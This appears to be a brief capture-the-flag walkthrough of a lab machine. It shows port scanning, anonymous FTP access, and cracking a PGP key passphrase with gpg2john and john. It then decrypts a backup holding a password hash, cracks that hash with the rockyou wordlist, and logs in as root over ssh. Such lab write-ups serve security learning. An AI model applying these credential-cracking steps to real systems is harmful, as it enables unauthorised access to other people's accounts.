rustscan
1 | rustscan -a 10.10.133.18 |
Output:
1 | PORT STATE SERVICE REASON |
ftp and ssh.
ftp
1 | ftp 10.10.133.18 |

mount
1 | cd Documents/CTF/THM/anonforce |
The first flag is in the home directory of melodias.
enum

notread is interesting.
crack pgp
1 | gpg2john ftp/notread/private.asc > hash |
password: xbox360
Import the key:
1 | gpg --import ftp/notread/private.asc |
Decrypt:
1 | gpg --decrypt ftp/notread/backup.pgp |

We can see the hash for melodias and root
1 | $6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0 |
Crack it with john.
1 | john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash2 |
Password: hikari
ssh
1 | ssh [email protected] |